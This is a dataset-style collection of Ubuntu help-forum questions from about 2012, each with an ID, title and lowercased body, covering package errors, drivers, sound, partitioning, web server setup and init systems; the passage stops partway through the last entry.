207822	is there a way to use evince to view pdf attachments in gmail	i 'm back to using gmail with firefox and when i click on pdf attachments they are forced open by the google docs viewer . i would much prefer that it used the default behavior i have set up for firefox ( using evince and mozplugger ) . is there a way to force gmail to use an alternative to google docs viewer ?
207825	ubuntu 12.10 update failed	failed to download repository information check your internet connection . w : failed to fetch http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead my internet connection works well . what are this updates and why it fails ?
207829	enigmail - how to encrypt only part of the message ?	when i confirmed my openpgp key on launchpad i got a mail from them , that was only partially encrypted with my key ( only few paragraphs inside the message ) . is it possible to encrypt only chosen part of the message with enigmail ? or what would be the easiest way to accomplish it ? added # 1 : i found a pretty convenient way for producing ascii armoured encrypted messages by using nautilus interface ( useful for ones that for some reason does n't like to work with terminal ) . you need to install nautilus-actions configuration tool , and add there a script with a name eg . `` encrypt in ascii '' and parameters : path : gpg parameters : -- batch -sear % x % f the trick is that now you can create file , with extension that would be name of your recipient , you can then fill it with your message , right click it in nautilus , choose `` encrypt in ascii '' , and you will have encrypted ascii file which content you can ( probably ) just copy to your message . but if anybody knows more convenient solution please share it . added # 1b : in the above case if you care more about security of your messages , it 's worth to turning off invisible backup files that gedit creates every time , you create new document , or just remember to delete them .
207846	how to downgrade from gnome shell 3.6.1 ?	when i upgraded from 12.04 to 12.10 , i did n't know it would upgrade my gnome shell version to 3.6.1 . now , all my extensions are useless . is there any way to revert back to the previous version ?
207847	nvidia powermizer performance level stuck at lv.2 from 4 possible	i have alienware m17xr3 laptop and ubuntu works great with it , except for the video . i 'm using bumblebee project to use the discrete card . i have nvidia gtx 580m and from the nvidia-settings i can see that powermizer never raises to level 4 . it goes max to level 2 and it stays there . i tried forcing the card to go max power with : optirun nvidia-settings -q all but it still goes only to level 2 . i tried eding my /etc/bumblebee/xorg.conf.nvidia and adding this two options : # ac settings : option `` registrydwords '' `` powermizerlevelac=0x1 '' # battery settings : option `` registrydwords '' `` powermizerlevel=0x1 '' but still no effect . i 'm aware of this problem for more than 2 months , but only a few days ago i decided to buy a game from ubuntu-software-center and i found out i could n't play it at max settings . i have tried a lot more things before , but i do n't remember them and they did n't help . i remember that i read in nvidia forums that this problem is due to dsd table from apic and there was a workaround to exchange the positions of two tables ... but at my side the two tables were with swapped content ( compared to the person in the nvidia forums ) and even though i tried exchanging their positions i got no positive results , but negative ones . i started to wonder that the easiest way would be to upgrade the bios image and see what happens , but i prefer not to do that , bacause i have more than 3 years warranty . if someone have any ideas i 'll be glad if he/she shares . and i forgot to mentioned that i used nvidia-current from ubuntu 's repo and tried the newest nvidia version from 310.14 for xorg-edgers , but without any success . thanks in advance . edit : just to note as this is a problem more specific to nvidia/linux , than ubuntu 's , i created a thread in nvidia 's new forum for linux support . here is the link to that thread : thread on nvidia 's forum edit2 : a lot of time has passed and no progress still . that 's why i tried asking and dell . here is a link to my thread there : dell 's forum edit3 : i 'm updating with a little bit more info my problem . after installing nvidia-313 from xorg-edgers ppa i got a new problem that my bios did n't everytime recognize my discrete nvidia card . i do n't think it 's caused by the driver , but it 's just a coincidence . so anyway i started researching it and i came accross one of the options in my bios in `` advanced '' tab `` primary display '' . it had two options `` sg '' ( switchable graphics ) and peg ( peripheral graphics ) . on sg i have optimus enabled and on peg i have only my discrete card enabled . on sg i was suffering the problem that my nvidia card is n't found each time , while on peg it was found each time . so after setting primary display to peg i installed again nvidia-313 package and tried powermizer . this time it worked . i tested with `` amnesia : the dark descend '' and the game was n't lagging anymore . after checking powermizer i confirmed that it was moving successfully between all 4 performance levels . there was something that i did n't like about it though . powermizer was preffering the loweest and highest performance levels . for example if i 'm on the lowwest and started changing desktops , the desktop animations lag a little but powermizer statys in lowwest level . when doing the same when in highes level it does n't go down . so it looks like when optimus is enabled powermizer is n't working correctly , but when it 's disabled powermizer can use all performance levels .
207849	ca n't install a package due to `` something wicked happened resolving '' error	i 'm following these instructions to install git on my laptop . when i do : $ sudo apt-get install git-core this is what my terinal shows : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libasprintf0c2 : i386 libcroco3 : i386 libgettextpo0 : i386 libgomp1 : i386 libunistring0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : git git-man liberror-perl suggested packages : git-daemon-run git-daemon-sysvinit git-doc git-el git-arch git-cvs git-svn git-email git-gui gitk gitweb the following new packages will be installed : git git-core git-man liberror-perl 0 upgraded , 4 newly installed , 0 to remove and 0 not upgraded . need to get 6,825 kb of archives . after this operation , 15.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! liberror-perl git-man git git-core install these packages without verification [ y/n ] ? e : some packages could not be authenticated lucas @ lucas-inspiron-n5050 : ~ $ sudo apt-get install git-core reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libasprintf0c2 : i386 libcroco3 : i386 libgettextpo0 : i386 libgomp1 : i386 libunistring0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : git git-man liberror-perl suggested packages : git-daemon-run git-daemon-sysvinit git-doc git-el git-arch git-cvs git-svn git-email git-gui gitk gitweb the following new packages will be installed : git git-core git-man liberror-perl 0 upgraded , 4 newly installed , 0 to remove and 0 not upgraded . need to get 6,825 kb of archives . after this operation , 15.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! liberror-perl git-man git git-core install these packages without verification [ y/n ] ? y err httpq : //py.archive.ubuntu.com/ubuntu/quantal/main liberror-perl all 0.17-1 something wicked happened resolving 'py.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err httpq : //py.archive.ubuntu.com/ubuntu/ quantal/main git-man all 1:1.7.10.4-1ubuntu1 something wicked happened resolving 'py.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err httpq : //py.archive.ubuntu.com/ubuntu/ quantal/main git amd64 1:1.7.10.4-1ubuntu1 something wicked happened resolving 'py.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err httpq : //py.archive.ubuntu.com/ubuntu/ quantal/main git-core all 1:1.7.10.4-1ubuntu1 something wicked happened resolving 'py.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch httpq : //py.archive.ubuntu.com/ubuntu/pool/main/libe/liberror-perl/liberrorperl_0.17-1_all.deb something wicked happened resolving 'py.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch httpq : //py.archive.ubuntu.com/ubuntu/pool/main/g/gi/git-man_1.7.10.4-1ubuntu1_all.deb something wicked happened resolving 'py.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch httpq : //py.archive.ubuntu.com/ubuntu/pool/main/g/git/git_1.7.10.4-1ubuntu1_amd64.deb something wicked happened resolving 'py.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch http : //py.archive.ubuntu.com/ubuntu/pool/main/g/git/git-core_1.7.10.4-1ubuntu1_all.deb something wicked happened resolving 'py.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? how could i install git on ubuntu 12.10 ? i ca n't even do it from the ubuntu software center . thanks in advance !
207852	automatically keep track of all changes to a folder	is there any software for ubuntu that can keep track of changes to a specific folder , and restore previous versions of the folder ? it would be useful to see all the changes that had been made to a specific folder ( so that if i modified a file by accident , i could quickly restore the file to its original state . )
207854	how to reset or recover password without grub ?	using ubuntu 10.04 . yesterday , i removed the password on one user so that my mother could access my computer . when i tried putting the same password back , i was unable to unlock the user settings to do so using that password . now , whenever i try a sudo command in the terminal , it wo n't accept the password that i know to be correct . there has never been another password on this computer for any user , so there 's no chance that i 'm just mistaken with what the password is . caps lock and num lock are both disabled , so it 's not that either . i 've been told to use the boot menu to reset it , but i have tried and failed multiple times to open the boot menu . i ca n't reinstall grub as i do n't know the password . i 've been trying for hours to figure out a way to reset/recover the password without having to use the grub boot menu without any luck . i 've also tried messing with the /etc/default/grub settings to access the grub menu , but i ca n't change those without the password . i 'm basically stuck in a loop of issues and ca n't figure out how to fix any of this . any help would be appreciated .
207857	how to get my localhost with a different directory to my index working ?	i ca n't get my apache configuration to open my index.html i edited my /etc/apache2/apache2.conf and added the following at the bottom . < virtualhost *:80 > documentroot /media//data/directory/to/my/index-file/ servername host-test.com < /virtualhost > then i restarted my system . but , when i open localhost i get the : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . how to get localhost , with a different directory to my index , working in ubuntu 12.10 ( amd64 ) ?
207866	broadcom sta wireless driver failed install	i recently installed ubuntu 12.04.1 lts using wubi.exe on my dell inspiron 1545 and i 'm having some trouble getting my wireless to work properly . when i try to activate my broadcom sta wireless driver , the installation fails . i am brand new to ubuntu so i do n't have much knowledge on how to fix this problem .
207867	no sound playing on 12.10	i recently wiped my entire harddrive and switched from windows 7 to ubuntu 12.10 ( 32b - used to have everything 64 , but it said 32 was recomended ? ) . it seems that everything but my sound is working as intended . as i 'm pretty new to ubuntu and have only had very minimal experience in linux os ' , what are my options ? i used sudo aplay -l to see if it recognized my sound card ? and i got a ton of output listing something like 255 subdevices per device is found i 'm guessing.. not sure if that 's what was suppose to happen or not . nothing is muted , i made sure of that by looking around on the web for help topics . the thing is , it plays sound through my monitor speakers ( hdmi ) just fine , but not through my main speakers . so i 'm thinking it has to be with my sound card . using 'pacmd list ' i get a long list of stuff , but only copied some of it ; not sure if it will be useful or not . 2 card ( s ) available . index : 0 name : < alsa_card.pci-0000_01_0a.0 > driver : < module-alsa-card.c > owner module : 4 properties : alsa.card = `` 0 '' alsa.card_name = `` creative x-fi '' alsa.long_card_name = `` creative x-fi 20k1 unknown '' alsa.driver_name = `` snd_ctxfi '' device.bus_path = `` pci-0000:01:0a.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:04.0/0000:01:0a.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 1102 '' device.vendor.name = `` creative labs '' device.product.name = `` sb x-fi '' device.string = `` 0 '' device.description = `` sb x-fi '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci ''
207871	can you install ubuntu directly to a hdd ?	i was wondering since i am having problems with my computer 's cd-rom drive and live-cd 's , is it possible to install ubuntu directly to the hard drive ? for example , wipe the whole hard drive and burn the ubuntu install iso to it , let the computer boot from the hard drive into the install interface , and then install ubuntu on the same hard drive . its far fetched- but is it possible ? thanks .
207876	display in applications on ubuntu 12.10 is broken - maybe theme problem	i have a problem which looks like this : if you take a look at buttons `` apply '' , `` reset '' , `` close '' or any other buttons or drop-downs , you will see there is no style on them . it is a fresh install of ubuntu 12.10 and it was working on the beginning . but after some time setting up ubuntu i noticed the style on the elements has gone - i do n't know when . i installed compiz-settings - maybe that caused - but when i un-install nothing changes . also checking/unchecking `` window decoration '' in compiz does n't help . i might found a solution in this post . i will try once i get to my computer . how do i restart the window manager ?
207880	changing default text input on nexus 7 ubuntu to bluetooth keyboard	i was curious if it was possible to use a logitech bluetooth keyboard for android 4.0+ with ubuntu on nexus 7 ? i was able to connect the keyboard regularly with the gui , the pin worked , so i would assume it is a matter of changing the default text input . i searched all of the settings i could find without finding any such option . any help would be appreciated , if this is not possible feel free to say so and close this thread .
207885	root and home are on seperate partitions , but home still uses up space on root ?	when installing ubuntu 12.10 for the first time , i made sure /home had it 's own partition , gave it about 185gb , and gave root ~10gb . now root is almost full after a few days and i 've noticed that root is as big as /home and some additional mb from some actual root files . note that i deleted some unused files in /home to make sure it really affects how much space is used in root , and it clearly does . ( checked in gparted ) i 've also made sure the files i am talking about are actually in /home/myname/ and not just in root 's home . df -h spits out this information : df : `/root/.gvfs ' : permission denied filesystem size used avail use % mounted on /dev/sdb2 9.2g 7.9g 908m 90 % / udev 3.9g 12k 3.9g 1 % /dev tmpfs 1.6g 932k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 6.4m 3.9g 1 % /run/shm none 100m 112k 100m 1 % /run/user /dev/sdb3 184g 4.9g 170g 3 % /home /dev/sdb4 729g 87g 642g 12 % /media/mave/storage i cut out my windows partitions as i do n't see any relevance . i hope this is enough information for someone to tell me what i did wrong here another call of df -h after deleting some more files : filesystem size used avail use % mounted on /dev/sdb2 9.2g 7.7g 1.1g 88 % / udev 3.9g 12k 3.9g 1 % /dev tmpfs 1.6g 932k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 6.2m 3.9g 1 % /run/shm none 100m 100k 100m 1 % /run/user /dev/sdb3 184g 4.9g 170g 3 % /home /dev/sdb4 729g 87g 642g 12 % /media/mave/storage
207886	how to improve performance of ubuntu 12.10 ?	my dell have 3gb ram . in windows 7 , i can easily get 22-25 mbps copying speed but here in ubuntu i am getting only 7-8 mbps . i even installed zram . sudo add-apt-repository ppa : shnatsel/zram sudo apt-get update sudo apt-get install zramswap-enabler this also did not worked . please tell me how can i improve my laptop 's performance ?
207889	no sound coming from hdmi	( ubuntu 12.04 x64 ) after looking at other questions ( here and other sites ) and trying their respective answers , i am still unable to get the hdmi audio out working . i have downloaded the recommended hardware drivers for my card ( radeon hd 4350 ) , made sure that the card is not muted in alsamixer , and set it as the correct output device in sound settings . i have also disabled the onboard sound devices in the bios menu . in aplay -l , it shows my hdmi card as hw:0,3 even after doing sound tests i still can not hear anything . any suggestions ? not sure where to go from here , i am fairly new to linux .
207890	install ubuntu on a virtualbox without usb or cd drive	i 'm using ubuntu 12.04 on my machine and trying to install 10.04 on virtualbox . i have already downloaded the .iso image . i was wondering if it 's possible to install this without writing this image to usb or cd drive .
207894	is it ok to run with unknown video device ?	i 'm new to linux and just starting to learn . from what i 've read and experimented with there 's no more support for older ati mobility cards . i resolved a few boot issues with my first install of ubuntu 12.10 ( now on clean install # 3 ) and my system seems to function okay with video unknown . picture quality is good and no issues with video playback . it functions for my purposes . should i leave it as is ... or will this cause problems i 'm not aware of ?
207899	changing file structure	a lot of times when i 'm unzipping files , i 'll get a messed up directory structure that looks like /home/bob/myfolder/myfolder/otherstuff . where the only thing that the first myfolder contains is another directory named myfolder . how could i collapse this path to get /home/bob/myfolder/otherstuff ? i.e . i want to remove the useless in-between link .
207905	connected to wireless network but no internet	i 'm connected to my wireless network but am unable to connect to the internet . it appears i do not have an ip address and i 'm not sure what to do . i had working internet until i booted up this morning . what is the best way to fix this in ubuntu 10.04
207920	can not install kubuntu-desktop	tried installing 'kubuntu-desktop ' from synaptic manager . but , failed showing the following error- '' could not mark all packages for installation or upgrade the following packages have unresolvable dependencies . make sure all required repositories are added and enabled in preferences . kubuntu-desktop : < br > depends : ark but it is not going to be installed < br > depends : dolphin but it is not going to be installed < br > depends : kde-window-manager < br > depends : kde-workspace-bin but it is not going to be installed < br > depends : kdemultimedia-kio-plugins but it is not going to be installed < br > depends : kdepasswd but it is not going to be installed < br > depends : kdm but it is not going to be installed < br > depends : khelpcenter4 but it is not going to be installed < br > depends : klipper but it is not going to be installed < br > depends : kmix but it is not going to be installed < br > depends : konsole but it is not going to be installed < br > depends : ksnapshot but it is not going to be installed < br > depends : ksysguard but it is not going to be installed < br > depends : language-selector-kde but it is not going to be installed < br > depends : okular but it is not going to be installed < br > depends : plasma-desktop but it is not going to be installed < br > depends : plasma-netbook but it is not going to be installed < br > depends : software-properties-kde but it is not going to be installed < br > depends : systemsettings but it is not going to be installed < br > recommends : akregator but it is not going to be installed < br > recommends : amarok but it is not going to be installed < br > recommends : apport-kde but it is not going to be installed < br > recommends : apturl-kde but it is not going to be installed ... . ... ... ... . '' my '/etc/apt/sources.list ' has the following- ' # see 'http : //help.ubuntu.com/community/upgradenotes ' for how to upgrade to < br > ' # newer versions of the distribution. < br > 'deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / 'dists/precise/main/binary-i386/ < br > ' # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / 'dists/precise/restricted/binary-i386/ < br > ' # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / 'precise main restricted < br > 'deb 'http : //archive.ubuntu.com/ubuntu precise main restricted multiverse < br > ' # # major bug fix updates produced after the final release of the < br > ' # # distribution. < br > ' # # n.b . software from this repository is entirely unsupported by the ubuntu < br > ' # # team . also , please note that software in universe will not receive any < br > ' # # review or updates from the ubuntu security team. < br > 'deb 'http : //archive.ubuntu.com/ubuntu precise universe < br > ' # # n.b . software from this repository is entirely unsupported by the ubuntu < br > ' # # team , and may not be under a free licence . please satisfy yourself as to < br > ' # # your rights to use the software . also , please note that software in < br > ' # # multiverse will not receive any review or updates from the ubuntu < br > ' # # security team. < br > ' # # n.b . software from this repository may not have been tested as < br > ' # # extensively as that contained in the main release , although it includes < br > ' # # newer versions of some applications which may provide useful features. < br > ' # # also , please note that software in backports will not receive any review < br > ' # # or updates from the ubuntu security team. < br > 'deb 'http : //archive.ubuntu.com/ubuntu precise-security main restricted multiverse < br > 'deb 'http : //archive.ubuntu.com/ubuntu precise-security universe < br > ' # # uncomment the following two lines to add software from canonical 's < br > ' # # 'partner ' repository. < br > ' # # this software is not part of ubuntu , but is offered by canonical and the < br > ' # # respective vendors as a service to ubuntu users. < br > 'deb 'http : //archive.canonical.com/ubuntu oneiric partner < br > ' # deb-src 'http : //archive.canonical.com/ubuntu oneiric partner < br > ' # # this software is not part of ubuntu , but is offered by third-party < br > ' # # developers who want to ship their latest software. < br > ' # deb 'http : //extras.ubuntu.com/ubuntu precise main < br > ' # deb-src 'http : //extras.ubuntu.com/ubuntu precise main kindly give a solution ...
207921	can i display chrome/chromium tabs in the top panel ?	is it possible to display chrome/chromium tabs in the top panel of ubuntu 12.10 ?
207923	is there a sticky note application similar to windows sticky note ?	similar question is there a sticky note application ? but not able to find this sticky-notes in ubuntu 12.10 on windows 7 , there is this sticky note app that will always start itself up and show itself in the same place with all the text you have written when you boot windows up . you can also have multiple instances of the sticky note . tried xpad but it is not that good : ( so do we have any equivalent app for ubuntu 12.10 ? ?
207924	uninstall windows after installing ubuntu with windows ?	would it be possible to somehow uninstall windows after installing ubuntu with wubi.exe ? so i install ubuntu using windows , but then remove windows and add grub so the computer boots up to only ubuntu afterwards ? i am having a hard time with using usb or cd 's , and wubi seems to be the easiest method . any help is appreciated : )
207929	another bootmgr is missing question	i downloaded an os uninstaller , and uninstalled windows and all its backups . i just want ubuntu on my laptop . so when i turned it back on , bootmgr is missing press any key to restart . any way around this ?
207935	ubuntu boots into tty1 after driver downgrade	earlier today i downgraded the driver for my nvidia 240 gt from version 310 to version 304 using ubuntus `` additional drivers '' utility . after the install i rebooted but instead of opening unity and allowing me to login it booted into tty1 instead . after using the `` startx '' command i got the message , `` nvidia : api mismatch : the nvidia kernel module has version 310.14 , but this nvidia driver component has version 304.43 . '' what can i do to solve this ? edit : solved my own problem by purging all nvidia packaged and reinstalling my drivers .
207936	what program starts dbus-daemon ?	what program starts the per user session dbus-daemon process in gnome 2 and gnome 3 ( presumably via dbus-launch ) ? i would like to know because i would like to add a directory to the list of directories that dbus-daemon checks for .service files . ( obviously if it 's a sh program , `` sh '' is n't the answer i 'm looking for ; - ) how could i have answered this question for myself efficiently ? what documentation is there on desktop and session startup ?
207940	when cloning linux systems	assuming you want to use the same os type on each computer ( ex : intel x32 bit ) , is it possible to clone one linux file system of one computer ( ie the entire os ) to another computer 's hard drive that is a different brand and model computer from the first one ? when ubuntu installer installs ubuntu on the computer , does it set it up so it can only run on ( for the conversation , a compaq presario ) to where if i tried to clone the compaq 's hard drive to a ( for say , a sony 's computer ) hard drive ubuntu would n't run properly on the sony ? i guess the short version of the question is- can you clone a linux os from one computer to another computer that is a different model and manufacturer than the first one ? thanks : )
207943	xubuntu : disks utility ( palimpsest ) and gparted not showing up anywhere after installation	so i 've downloaded gparted and disks from the software center . according to software center , they 've both installed successfully ... but they 're nowhere to be found . even in my terminal : $ palimpsest palimpsest : command not found i 've looked in usr/bin ... no `` palimpsest '' , no `` gnome-disk-utility '' . in usr/share/gnome-disk-utility there 's a bunch of .ui files . according to software center , both programs are now installed in my computer , but it seems i 've no way to find them . i 've tried re-installing and restarting . i 'm on xubuntu 32 bit .
207946	fill empty space in inkscape ?	i am new to inkscape , and it is a little complex . i have been trying to make vector/svg version of png icons i am working on . i use path > trace bitmap to create vector versions of my png . my issue is that it does not retain the white area within the icon . how can i use inkscape to fill in the empty area with white ? left svg , right png
207951	how can i get an interactive shell as another non-root user ?	i 'm using ubuntu 10.04 lts server , with the default security model ( root locked , using sudo to elevate privileges ) . i occasionally enjoy using sudo -i when i 'll need to run a series of commands with elevated privileges , or when i need to rummage around in directories with root-only privileges . sometimes , when setting up software that 'll run as its own non-privileged system account ( adduser -- system -- group -- no-create-home -- disabled-login some-daemon-user ) i find that i need to run a sequence of commands as that user , rather than myself or root . i 've tried using sudo -i -u some-daemon-user , but it just returns a 1 status without any error message . i 've checked the syslog , messages , auth , and debug log files in /var/log and none of them include any messages that reference sudo or the account in question . so , is it possible to become another non-root user , sudo-style without just setting a password and logging in ( as them ) ? is my system 'broken ' in some way or am i just doing it wrong ?
207955	is it a must to download and install all packages when install ubuntu 12.04 ?	i am installing ubuntu 12.04 lts on a dell latitude d620 laptop , using a usb stick . what i can see during the installation is that it is downloading packages from the internet , including language packs . i go ahead and click that 'skip ' button then restart . but there comes a system error after i log in , plus i ca n't open 'additional drivers ' . the error 's not gone until an 'sudo apt-get update'+'sudo apt-get upgrade'+'sudo apt-get dist-upgrade ' , and after that i can open 'additional drivers ' to install nvidia drivers . so my question is , is it a must to download and install all packages during installation ? if it is , why does ubuntu provide a button 'skip ' ?
207957	php-fpm - nginx - phpmyadmin - 502 bad gateway	i have installed and configured php-fpm , nginx , and then phpmyadmin . when i access the main site everything works fine but as soon as i go to http : //mysite.com/phpmyadmin i get a 502 bad gateway error . when i look in my error logs i see the following error repeated throughout : ( 111 : connection refused ) while connecting to upstream , client : xx.xx.xx.xx here is my default.conf for nginx : http : //pastebin.com/yfevaw81 i have tried many different configurations that i have found from users that have had the same issue but ca n't seem to get any of them to work .
207959	network simulator 3 ( ns3 ) problem on ubuntu 12.10	i am trying to install support for mpi-based distributed emulation ( sudo apt-get install openmpi* ) but i ca n't . terminal says : error @ ubuntu : ~ $ sudo apt-get install openmpi* reading package lists ... done building dependency tree reading state information ... done note , selecting 'libopenmpi1.6-dbg ' for regex 'openmpi*' note , selecting 'libmeep-openmpi6 ' for regex 'openmpi*' note , selecting 'libopenmpi1.6-dev ' for regex 'openmpi*' note , selecting 'libmeep-openmpi-dev ' for regex 'openmpi*' note , selecting 'libhdf5-openmpi-7 ' for regex 'openmpi*' note , selecting 'meep-openmpi ' for regex 'openmpi*' note , selecting 'libhdf5-openmpi-7-dbg ' for regex 'openmpi*' note , selecting 'openmpi1.6-common ' for regex 'openmpi*' note , selecting 'openmpipython ' for regex 'openmpi*' note , selecting 'yorick-mpy-openmpi ' for regex 'openmpi*' note , selecting 'gromacs-openmpi ' for regex 'openmpi*' note , selecting 'mpqc-openmpi ' for regex 'openmpi*' note , selecting 'libopenmpi1.3 ' for regex 'openmpi*' note , selecting 'libopenmpi1.6 ' for regex 'openmpi*' note , selecting 'openmpi-checkpoint ' for regex 'openmpi*' note , selecting 'octave-openmpi-ext ' for regex 'openmpi*' note , selecting 'libhdf5-openmpi-dev ' for regex 'openmpi*' note , selecting 'openmpi-libs0 ' for regex 'openmpi*' note , selecting 'openmpi1.6-bin ' for regex 'openmpi*' note , selecting 'openmpi-mpidoc ' for regex 'openmpi*' note , selecting 'netpipe-openmpi ' for regex 'openmpi*' note , selecting 'libhdf5-openmpi-1.8.4 ' for regex 'openmpi*' note , selecting 'libhdf5-openmpi-1.8.6 ' for regex 'openmpi*' note , selecting 'libhdf5-openmpi-1.8.7 ' for regex 'openmpi*' note , selecting 'openmpi1.6-doc ' for regex 'openmpi*' note , selecting 'openmpi-bin ' for regex 'openmpi*' note , selecting 'openmpi-dbg ' for regex 'openmpi*' note , selecting 'openmpi-dev ' for regex 'openmpi*' note , selecting 'openmpi-doc ' for regex 'openmpi*' note , selecting 'openmpi-common ' for regex 'openmpi*' note , selecting 'libopenmpi-dbg ' for regex 'openmpi*' note , selecting 'libopenmpi-dev ' for regex 'openmpi*' note , selecting 'openmpi1.6-checkpoint ' for regex 'openmpi*' note , selecting 'libopenmpi1 ' for regex 'openmpi*' note , selecting 'libopenmpi2 ' for regex 'openmpi*' note , selecting 'libopenmpi-dev ' instead of 'openmpi-dev' note , selecting 'libopenmpi-dbg ' instead of 'openmpi-dbg' note , selecting 'libopenmpi1.3 ' instead of 'openmpi-libs0' note , selecting 'openmpi-doc ' instead of 'openmpi-mpidoc' some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libopenmpi1.6 : conflicts : libopenmpi1.3 but 1.4.5-1ubuntu1 is to be installed conflicts : openmpi-libs0 libopenmpi1.6-dbg : conflicts : libopenmpi-dbg but 1.4.5-1ubuntu1 is to be installed conflicts : openmpi-dbg libopenmpi1.6-dev : conflicts : libopenmpi-dev but 1.4.5-1ubuntu1 is to be installed conflicts : openmpi-dev openmpi1.6-bin : conflicts : openmpi-bin but 1.4.5-1ubuntu1 is to be installed openmpi1.6-checkpoint : conflicts : openmpi-checkpoint but 1.4.5-1ubuntu1 is to be installed openmpi1.6-common : conflicts : openmpi-common but 1.4.5-1ubuntu1 is to be installed openmpi1.6-doc : conflicts : openmpi-checkpoint ( < 1.6.4-1 ) but 1.4.5-1ubuntu1 is to be installed conflicts : openmpi-doc but 1.4.5-1ubuntu1 is to be installed conflicts : openmpi-mpidoc e : unable to correct problems , you have held broken packages .
207960	glib.h error while trying to compile an application	i 've been trying to compile this app from source https : //code.launchpad.net/gala and i keep getting this message when i run make : scanning dependencies of target gala [ 11 % ] building c object cmakefiles/gala.dir/src/dbus.c.o /home/camilo/notifications/build/src/dbus.c:21:18 : fatal error : glib.h : no such file or directory compilation terminated . make [ 2 ] : *** [ cmakefiles/gala.dir/src/dbus.c.o ] error 1 make [ 1 ] : *** [ cmakefiles/gala.dir/all ] error 2 make : *** [ all ] error 2 even though i ' have installed glib and there is the glib.h file camilo @ ian : ~ $ find /usr -iname glib.h /usr/include/glib-2.0/glib.h is it a bug form the application or is it something wrong with my system ?
207966	upgrade to 12.04 lts failed , unable to boot	i was trying to upgrade to 12.04 lts , but the upgrade froze in the process ( it was stuck for over 8 hours ) and i had to do a hard reboot . now when i boot up , i get the following : mountall /lib/x86_64-linux-gnu/libc.so.6 version 'glibc_2.14 ' not found . i 'm not sure what i need to do from here . do i need to go back to the previous version ? or can 12.04 still be installed ? i do n't want to lose any of my files . i am still new to linux , so please give detailed step-by-step instructions .
207972	i have a esxi 5.0 installed and when i am installing ubuntu server 12.04 lts it is giving an error saying grub installation failed ?	i have esxi 5.0 installed and when i am installing ubuntu server 12.04 lts ( 32 bit ) it is giving an error saying grub installation failed here is a screenshot of the error : i have other ubuntu servers running fine on this esxi server , so i do n't think problem is with esxi . i have 32 gb of ram spare on this esxi and have given 2 gb of ram to this 12.0 lts vm . i have allocated 2 processor cores . i have tried supplying different iso image to this vm as i thought the 1st image that i downloaded has errors . but that 's definitely not the case as all 3 different iso images that i downloaded of ubuntu server 12.04 lts ( 32-bit ) ca n't be corrupt ! just to make sure that the image does not have problem i used that image to install it for testing on stand alone system . it works fine there ! this is a production esxi server which i ca n't play with , however i can play with the ubuntu server 12.04 lts ( 32-bit ) vm that we have created on that esxi . here is more information for another attempt : for this install , i 've given 1 core of the xenon processor , 1 gb of ram and 20 gb of hhd . i have used lvm with the automatic partition manager ( where i do not have to create partitions manually ) . i do not have any working ubuntu 12.04 lts image installed anywhere . : ( i tried installing ubuntu 12.10 on the same vm which worked well , however that is of no use to me as i need ubuntu 12.04 lts only for testing purpose . please let me know if you need any further details.â i need help on this as soon as possible , as the go live date of this server is really close .
207973	what is the current state of ubuntu 's transition from init scripts to upstart ?	what is the current state of ubuntu 's transition from init.d scripts to upstart ? i was curious , so i compared the contents of /etc/init.d/ to /etc/init/ on one of our development machines , which is running ubuntu 12.04 lts server . # /etc/init.d/ # /etc/init/ acpid acpid.conf apache2 -- -- -- -- -- -- -- -- -- -- -- -- -- - apparmor -- -- -- -- -- -- -- -- -- -- -- -- -- - apport apport.conf atd atd.conf bind9 -- -- -- -- -- -- -- -- -- -- -- -- -- - bootlogd -- -- -- -- -- -- -- -- -- -- -- -- -- - cgroup-lite cgroup-lite.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - console.conf console-setup console-setup.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - container-detect.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - control-alt-delete.conf cron cron.conf dbus dbus.conf dmesg dmesg.conf dns-clean -- -- -- -- -- -- -- -- -- -- -- -- -- - friendly-recovery -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- - failsafe.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - flush-early-job-log.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - friendly-recovery.conf grub-common -- -- -- -- -- -- -- -- -- -- -- -- -- - halt -- -- -- -- -- -- -- -- -- -- -- -- -- - hostname hostname.conf hwclock hwclock.conf hwclock-save hwclock-save.conf irqbalance irqbalance.conf killprocs -- -- -- -- -- -- -- -- -- -- -- -- -- - lxc lxc.conf lxc-net lxc-net.conf module-init-tools module-init-tools.conf -- 